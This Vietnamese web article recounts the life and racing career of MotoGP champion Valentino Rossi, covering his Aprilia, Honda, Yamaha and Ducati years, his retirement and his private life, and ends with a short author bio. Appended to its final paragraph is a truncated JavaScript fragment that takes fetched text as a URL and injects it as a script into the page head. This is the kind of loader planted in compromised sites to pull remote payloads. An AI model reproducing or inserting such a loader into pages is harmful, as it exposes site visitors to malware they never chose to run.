Tiểu sử Valentino Rossi – Huyền thoại MotoGP với sự nghiệp vĩ đại

Tiểu sử Valentino Rossi, một trong những tay đua MotoGP vĩ đại nhất mọi thời đại, đã ghi dấu ấn sâu đậm trong lịch sử thể thao tốc độ với sự nghiệp lẫy lừng và những thành tích đáng kinh ngạc. 

Tiểu sử Valentino Rossi

Tiểu sử Valentino Rossi 1

Valentino Rossi (sinh ngày 16 tháng 2 năm 1979 tại Urbino, Italy) là một tay đua môtô chuyên nghiệp nổi tiếng, được biết đến với biệt danh “The Doctor”. Trong sự nghiệp của mình, Rossi đã giành chức vô địch ở nhiều phân khúc đua xe khác nhau. Anh đã vô địch thế giới tổng cộng 9 lần, bao gồm 7 lần ở thể thức 500cc/MotoGP, 1 lần ở thể thức 250cc và 1 lần ở thể thức 125cc.

Suốt sự nghiệp, Rossi luôn gắn liền với con số 46 và được vinh danh là một trong những tay đua môtô vĩ đại nhất lịch sử. Anh cũng đã được trao tặng danh hiệu Huyền thoại MotoGP, khng định vị thế của mình trong làng đua xe thế giới.

Sự nghiệp

Tiểu sử Valentino Rossi 2

Những năm đầu tiên

Valentino Rossi là con trai của cựu tay đua môtô chuyên nghiệp Graziano Rossi, và đã quen thuộc với những chiếc xe môtô mini từ khi còn rất nhỏ, chỉ mới 2 tuổi. Tuy nhiên, do lo lắng về sự an toàn của con trai, mẹ của Rossi đã thuyết phục Graziano mua cho anh một chiếc xe kart để chơi. Từ đó, tình yêu đua xe đầu tiên của Rossi bắt nguồn từ môn đua xe kart.

Khi lớn hơn, Valentino Rossi bắt đầu tham gia các giải đua kart và vào năm 1990, anh đã vô địch một giải đua kart địa phương. Đây cũng là thời điểm Rossi bắt đầu quay lại với những chiếc xe môtô mini và cũng giành được một số chiến thắng đáng kể.

Rossi tiếp tục thi đấu trong các giải kart và đã xếp thứ năm tại một giải đấu ở Parma. Cả Rossi và Graziano sau đó quyết định tham gia các giải đua kart 100cc ở cấp độ quốc gia và châu Âu, với mục tiêu hướng đến trở thành một tay đua Công thức 1. Tuy nhiên, do chi phí quá cao, gia đình quyết định để anh theo đuổi sự nghiệp đua môtô. Hoạt động đua xe của Rossi bị gián đoạn trong khoảng một năm (1992-1993) vì lịch học văn hóa của anh.

Tiểu sử Valentino Rossi 3

Năm 1993, Rossi bắt đầu tham gia giải đua cấp quốc gia 125cc Italian Sport Production Championship với chiếc xe Cagiva Mito. Trong cuộc đua đầu tiên, Rossi đã gặp sự cố khi ngã xe ngay tại góc cua đầu tiên, cách cổng pit-lane khoảng 100m, nhưng vẫn kịp về đích ở vị trí thứ 9. Tại chặng đua cuối cùng ở Misano, Rossi đã giành được pole và đứng lên bục podium.

Trong mùa giải thứ hai, Rossi được cấp một chiếc xe xưởng Mito và đã giành chức vô địch. Năm 1994, anh tham gia thêm giải Italian 125CC Championship trên chiếc xe Sandroni với động cơ Rotax. Đến năm 1995, Rossi chuyển sang sử dụng xe Aprilia, giành chức vô địch Italian 125CC Championship và xếp hạng ba tại European Championship.

Aprilia (125cc và 250cc)

Năm 1996, Rossi bắt đầu sự nghiệp chuyên nghiệp. Anh giành podium đầu tiên tại GP Áo và chiến thắng đầu tiên tại GP Cộng hòa Séc, kết thúc mùa giải ở vị trí thứ 9. Mùa giải 1997 chứng kiến sự tiến bộ vượt bậc của Rossi khi anh giành 11 chiến thắng trong 15 chặng đua, giành chức vô địch đầu tiên trong sự nghiệp.

Năm 1998, Rossi chuyển lên thi đấu ở thể thức 250cc, vẫn sử dụng xe Aprilia. Mặc dù giành 4 chiến thắng liên tục vào cuối mùa giải, nhưng Rossi chỉ giành ngôi Á quân do gặp nhiều khó khăn ở đầu mùa giải. Sang năm 1999, anh cải thiện phong độ, giành 9 chiến thắng và giành chức vô địch lần thứ hai.

Tiểu sử Valentino Rossi 4

Honda (2000-2003)

Năm 2000, Rossi chuyển lên hạng đấu cao nhất và được đội Nastro Azzurro cung cấp chiếc xe Honda NSR500. Mặc dù khởi đầu không tốt khi phải bỏ cuộc ở hai chặng đầu tiên (Nam Phi và Malaysia), Rossi nhanh chóng lấy lại phong độ và có 10 lần lên bục podium, trong đó có 2 chiến thắng tại Silverstone và Rio de Janeiro, giành ngôi Á quân.

Giai đoạn thống trị của Rossi bắt đầu từ năm 2001 khi anh giành 11 chiến thắng và mang về chức vô địch thứ ba trong sự nghiệp. Đây cũng là mùa giải cuối cùng của thể thức 500cc trước khi giải đua được đổi tên thành MotoGP vào năm 2002.

Năm 2002, Rossi chuyển sang đội Repsol Honda và tiếp tục thể hiện phong độ ấn tượng khi giành 11 chiến thắng và chỉ bỏ cuộc một lần trong suốt mùa giải. Phong độ này được duy trì trong năm 2003 khi Rossi lên bục podium ở mọi chặng đua và giành 9 chiến thắng.

Yamaha (2004-2010)

Năm 2004, Rossi bất ngờ chuyển sang đội đua Yamaha, đối thủ lớn của Honda. Anh không gặp khó khăn nào trong việc chuyển đội và đã giành thêm hai chức vô địch vào các năm 2004 và 2005.

Tiểu sử Valentino Rossi 5

Năm 2006, dù là tay đua giành nhiều chiến thắng nhất mùa giải, Rossi lại không duy trì được sự ổn định và để mất chức vô địch vào tay Nicky Hayden. Phong độ thiếu ổn định của Rossi tiếp tục trong mùa giải 2007, với sự vươn lên của các ngôi sao trẻ như Casey Stoner và Dani Pedrosa, khiến Rossi chỉ xếp thứ ba chung cuộc.

Năm 2008, Rossi có đồng đội mới là Jorge Lorenzo. Trên đường đua, Rossi lấy lại sự ổn định, không bỏ cuộc chặng nào, chỉ hai lần không lên podium và giành 9 chiến thắng, dễ dàng đoạt chức vô địch lần thứ tám.

Năm 2009, Lorenzo trở thành đối thủ chính của Rossi, nhưng do bỏ cuộc nhiều lần, Lorenzo không thể vượt qua Rossi. Với việc giành nhiều chiến thắng hơn, Rossi bảo vệ thành công chức vô địch, đạt danh hiệu vô địch thứ chín và cũng là cuối cùng trong sự nghiệp.

Năm 2010, dù Rossi chiến thắng chặng mở màn tại Qatar, nhưng tham vọng bảo vệ chức vô địch của anh bị chặn đứng bởi chấn thương nghiêm trọng tại chặng đua thứ tư ở GP Italia, khiến anh phải nghỉ thi đấu 4 chặng. Sau khi trở lại, Rossi giành thêm một chiến thắng ở GP Malaysia và kết thúc mùa giải ở vị trí thứ ba.

Không thành công ở Ducati (2011-2012)

Tiểu sử Valentino Rossi 6

Năm 2011, Valentino Rossi quyết định gia nhập Ducati với hy vọng trở thành tay đua người Ý đầu tiên giành chiến thắng trên chiếc xe đua của Ý. Tuy nhiên, Rossi không đạt được mục tiêu này. Trong suốt hai mùa giải tại Ducati, anh chỉ có ba lần bước lên bục podium, nhưng điểm số của anh vẫn vượt qua đồng đội Nicky Hayden.

Một trong những khoảnh khắc đáng nhớ của Rossi trong giai đoạn này là tại chặng đua MotoGP Tây Ban Nha 2011, khi anh va chạm với Casey Stoner, dẫn đến một câu nói nổi tiếng của Stoner: “Tham vọng của anh vượt quá tài năng của anh” (“Your ambition outweighs your talent”). Một ký ức buồn khác là tại chặng đua MotoGP Malaysia 2011, Rossi và Colin Edwards đã vô tình liên quan đến vụ tai nạn khiến Marco Simoncelli tử nạn.

Trở về Yamaha (2013-2020)

Năm 2013, Rossi trở lại Yamaha và nhanh chóng hòa nhập lại với đội đua. Ngay ở chặng đua mở màn tại Qatar, anh đã giành được podium và có chiến thắng đầu tiên sau hơn hai năm tại Assen. Tuy nhiên, so với đồng đội Jorge Lorenzo, Rossi vẫn kém hơn về tốc độ và kết thúc mùa giải với vị trí thứ tư.

Năm 2014, Rossi đã hoàn toàn lấy lại phong độ và cạnh tranh sòng phẳng với Lorenzo, kết thúc mùa giải ở vị trí Á quân. Anh giành được hai chiến thắng tại GP San Marino và GP Úc.

Năm 2015 là mùa giải đặc biệt ấn tượng của Rossi, khi anh liên tiếp giành podium trong 12 chặng đua đầu tiên, trong đó có 4 chiến thắng. Điều này giúp anh cạnh tranh quyết liệt cho danh hiệu vô địch với đồng đội Lorenzo. Tuy nhiên, sau sự cố tại GP Malaysia, Rossi bị phạt xuất phát từ vị trí cuối cùng ở chặng đua cuối tại Valencia, khiến anh mất chức vô địch vào tay Lorenzo.

Năm 2016, Rossi một lần nữa giành ngôi Á quân, dù không thể tạo ra áp lực lớn đối với nhà vô địch Marc Marquez. Anh có hai chiến thắng tại GP Tây Ban Nha và GP Catalunya nhưng gặp nhiều khó khăn với 4 lần phải bỏ cuộc.

Năm 2017, Rossi bắt đầu mùa giải mạnh mẽ với ba podium liên tiếp, nhưng sau đó thi đấu không ổn định và chỉ có thêm một chiến thắng tại Assen, kết thúc mùa giải ở vị trí thứ 5.

Tiểu sử Valentino Rossi 7

Năm 2018, dù không giành được chiến thắng nào, Rossi vẫn thi đấu ổn định và kết thúc mùa giải ở vị trí thứ ba. Anh có năm lần bước lên bục podium và giành pole cuối cùng trong sự nghiệp tại GP Italia.

Năm 2019, Rossi tiếp tục có khởi đầu tốt với hai lần về nhì liên tiếp tại GP Argentina và GP Americas. Tuy nhiên, anh gặp khó khăn ở giữa mùa giải với ba lần ngã xe liên tiếp và kết thúc mùa giải mà không giành được chiến thắng.

Năm 2020, Rossi giành podium cuối cùng trong sự nghiệp tại GP Andalucia, nhưng phong độ của anh suy giảm rõ rệt sau đó với ba lần bỏ cuộc liên tiếp và phải nghỉ thi đấu do mắc COVID-19.

Năm cuối sự nghiệp ở đội Sepang (2021) và giải nghệ

Năm 2021, Rossi chuyển sang đội đua vệ tinh của Yamaha là SRT, nhưng thi đấu rất khó khăn. Sau kỳ nghỉ hè, Rossi thông báo giải nghệ và tham gia chặng đua cuối cùng trong sự nghiệp tại GP Valencia, kết thúc ở vị trí thứ 10.

Những dấu ấn trong sự nghiệp đua xe

Tiểu sử Valentino Rossi 8

Thương hiệu cá nhân
Valentino Rossi là một trong những tay đua tiên phong trong việc xây dựng thương hiệu cá nhân. Anh nổi tiếng với số xe 46, biệt danh “The Doctor,” và màu sắc may mắn là vàng chanh. Chiếc nón bảo hiểm AGV Soleluna của Rossi là một trong những chiếc nón bảo hiểm nổi tiếng nhất thế giới.

Các môn đua xe khác
Dù là ngôi sao của MotoGP, Rossi vẫn tham gia nhiều giải đua khác như Suzuka 8 Hours, nơi anh cùng Colin Edwards giành chiến thắng năm 2001. Anh cũng tham gia đua xe ô tô và ba lần thử sức ở giải đua World Rally, cùng với các sự kiện như Monza Rally Show.

Tự thành lập đội đua riêng
Năm 2014, Rossi thành lập học viện đua xe VR46 và đội đua VR46. Từ năm 2022, đội đua VR46 đã chính thức tham gia thể thức MotoGP, tiếp tục di sản của Rossi trong thế giới đua xe.

Cuộc sống cá nhân

Valentino Rossi sinh ngày 16 tháng 2 năm 1979 tại Urbino, nhưng gia đình anh đã chuyển đến Tavullia khi anh còn nhỏ . Anh là con trai của Graziano Rossi, một tay đua môtô chuyên nghiệp nổi tiếng. Rossi có một người em trai cùng mẹ khác cha tên là Luca Marini, cũng là một tay đua MotoGP. Hai anh em từng là đối thủ của nhau trong mùa giải MotoGP 2021 .

Rossi chưa lập gia đình và hiện đang hẹn hò với người mẫu Francesca Sofia Novello .

Tiểu sử Valentino Rossi 9

Từ khi còn nhỏ, Rossi đã lấy cảm hứng từ thần tượng của mình, Norifumi Abe, và tự gọi mình là “Rossifumi”. Khi tham gia giải đua 250cc, anh đã sử dụng biệt danh “Valentinik”, lấy cảm hứng từ tên chú vịt Donald trong tiếng Ý là Paperinik. Đến khi chuyển sang giải đua 500cc, Rossi chọn biệt danh “THE DOCTOR”, vì nghề bác sĩ được rất kính trọng ở Italy. Anh cũng chia sẻ rằng từ khi bắt đầu đua ở hạng 500cc, anh đã trở nên điềm tĩnh hơn và không còn hay gây gổ với các đồng đội như khi còn ở giải 125cc và 250cc.

Ngoài sự nghiệp đua xe, Rossi là một cổ động viên nhiệt thành của câu lạc bộ Inter Milan .

Valentino Rossi không chỉ là một tay đua xuất sắc mà còn là biểu tượng sống động của lòng kiên trì và đam mê trong thể thao. Hành trình và những di sản của anh sẽ mãi mãi sống trong lòng người hâm mộ, trở thành nguồn cảm hứng cho các thế hệ tay đua tương lai.response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});

Tuấn Tài là một nhiếp ảnh gia chuyên săn lùng các bức ảnh về các trận đấu thể thao. Từ bóng đá, bóng rổ, cầu lông đến điền kinh và nhiều môn thể thao khác, Tuấn Tài luôn sẵn sàng với máy ảnh để bắt trọn những khoảnh khắc đáng nhớ trên sân đấu. Anh không chỉ có kỹ năng chuyên nghiệp trong việc chụp ảnh, mà còn có khả năng nắm bắt được những khoảnh khắc quan trọng và cảm xúc của từng trận đấu.